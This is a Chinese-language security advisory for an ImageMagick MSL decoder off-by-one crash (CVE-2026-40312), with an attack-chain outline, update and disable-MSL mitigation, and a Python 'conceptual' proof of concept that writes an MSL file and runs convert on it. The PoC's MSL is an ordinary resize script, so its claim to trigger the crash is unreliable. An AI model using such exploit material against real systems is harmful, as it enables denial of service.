CVE-2026-40312 CVSS 6.2 中危

CVE-2026-40312 ImageMagick MSL解码器越界漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40312

漏洞类型

内存越界

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ImageMagick

漏洞概述

ImageMagick在7.1.2-19版本之前的MSL解码器中存在越界错误漏洞。攻击者通过诱导本地系统读取恶意构造的MSL文件，可触发该漏洞导致应用程序崩溃。该漏洞利用无需用户交互和认证，主要影响系统的可用性。

技术细节

该漏洞源于ImageMagick处理MSL（Magick Scripting Language）文件时的解码逻辑缺陷。具体来说，代码中存在“off-by-one”错误，即在解析特定元素或属性时，循环计数或索引计算超出了缓冲区边界一个字节。当ImageMagick尝试读取恶意MSL文件时，会访问非法内存地址，从而引发段错误或异常终止。由于攻击向量为本地（AV:L），攻击者需具备本地文件执行权限或通过其他方式将恶意文件投递至目标系统。虽然主要影响是拒绝服务，但在特定堆布局下，内存破坏类漏洞理论上存在更严重风险，但目前主要表现为崩溃。

攻击链分析

STEP 1

侦查

确定目标系统上安装了易受攻击的ImageMagick版本（< 7.1.2-19）。

STEP 2

武器化

构建包含特定越界触发条件的恶意MSL脚本文件。

STEP 3

交付

由于攻击向量为本地（AV:L），将恶意文件上传至目标系统或诱导本地用户处理该文件。

STEP 4

利用

执行ImageMagick工具（如convert）读取并解析恶意MSL文件。

STEP 5

影响

MSL解码器在处理过程中发生越界内存访问，导致应用程序崩溃（拒绝服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-40312 (Conceptual)
# This script demonstrates how to trigger the crash using a malformed MSL file.

import os

# Malicious MSL content designed to trigger the off-by-one error
# The exact payload structure depends on the specific parser logic,
# but generally involves malformed XML tags within the MSL schema.
msl_payload = """<?xml version="1.0" encoding="UTF-8"?>
<image>
  <read filename="test.png" />
  <!-- Off-by-one trigger often involves boundary conditions in attributes -->
  <resize geometry="10000x10000" />
  <write filename="output.png" />
</image>
"""

filename = "exploit.msl"

# Create the malicious file
with open(filename, "w") as f:
    f.write(msl_payload)

print(f"[+] Created malicious MSL file: {filename}")

# Attempt to process the file with ImageMagick
# This command should trigger the crash in vulnerable versions
print("[*] Triggering the vulnerability via ImageMagick convert...")
os.system(f"convert {filename} output.png")

影响范围

ImageMagick < 7.1.2-19

防御指南

临时缓解措施

建议立即更新到修复版本。如果无法立即更新，应禁用MSL解码器或严格限制对MSL文件的解析操作，仅处理受信任的图像来源。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表